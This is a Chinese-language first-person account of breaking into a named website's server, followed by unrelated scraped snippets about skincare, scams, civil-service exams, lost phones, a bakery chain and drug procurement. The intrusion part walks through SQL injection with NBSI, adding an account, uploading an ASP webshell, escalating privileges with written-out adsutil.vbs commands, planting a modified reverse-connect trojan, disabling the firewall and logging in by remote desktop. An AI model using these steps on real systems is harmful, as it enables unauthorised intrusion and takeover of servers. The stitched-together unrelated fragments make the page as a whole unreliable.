ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马。接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便,我个人觉得这个 *** 非常好。
三、提升权限
先看哪些特权的:
cs cript C:\Inetpub\AdminS cripts\adsutil.vbs get /W3SVC/InProcessIsapiApps
得到:
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
把asp.dll加进去:
cs cript C:\Inetpub\AdminS cripts\adsutil.vbs
set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32
\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32
\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
然后用asp木马加个用户,显示命令完成。
四、TerminalService
接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了。但事实上它们欺骗我的感情,我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马,然后用木马在GUI下关掉了防火墙,再用3389登陆器登了上去,这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候,比较老道的 *** 大家可以用fpipe实现端口重定向,或者用httptunnel。和黑防里面说的那样,不过我试过没有成功过一次,而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样,不知道谁抄谁。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies)大家有兴趣的话可以去试一下,它可以穿透http *** 。
1,首先要制止制止无意识皱眉头习惯2,缝制一个约7厘米宽的弹力绷带,将1/4茶匙。 避免有关部位同一组表情肌经常处于紧张收缩状态,坚持下去自然会收到消去抬头纹。。 1.要在日常经常做滋润肌肤的工...
在日常生活中经常会发生一些诈骗的事件,近日一名男子给女大学生小潘打诈骗电话的时候却被小潘给灵魂规劝了,据了解,小潘曾经接到过诈骗电话,所以也上网查了一下骗子的手段,所以此次接到电话的时候便识破了骗子的...
三支一扶的利弊(到底要不要考三支一扶?)三支一扶有和利弊方面?待遇是什么样的?服务期是多久?下面将通过本文为大家介绍一下三支一扶的利弊,准备参加三支一扶考试的考生可以提前准备。 1、“三支一扶”人员工...
丢手机这件事儿放到对其依赖性极强的现在来说,简直是糟心到不能再糟心的事情了!一是心疼买手机的钱,二更担心手机里的信息泄露。 由于身边出现过不少朋友丢iPhone手机的情况,外加我自己也用的iPh...
从1个蛋挞,到260家+门店,一年卖出7300万颗蛋挞。从东莞第一排队美食,到火爆珠三角。它是烘焙业的“喜茶+喜加德”。它是怎么做到的? 我们开业啦! 3月13日早8点,广州越秀区一家小店门前...
新的一年,看病用药也有了好消息。国家组织药品集中采购和使用联合采购办公室日前发布全国药品集中采购文件,33个品种入选第二批国家药品集中采购名单,又一波降价药品已经“在路上”。 第二批国家药品集中采购...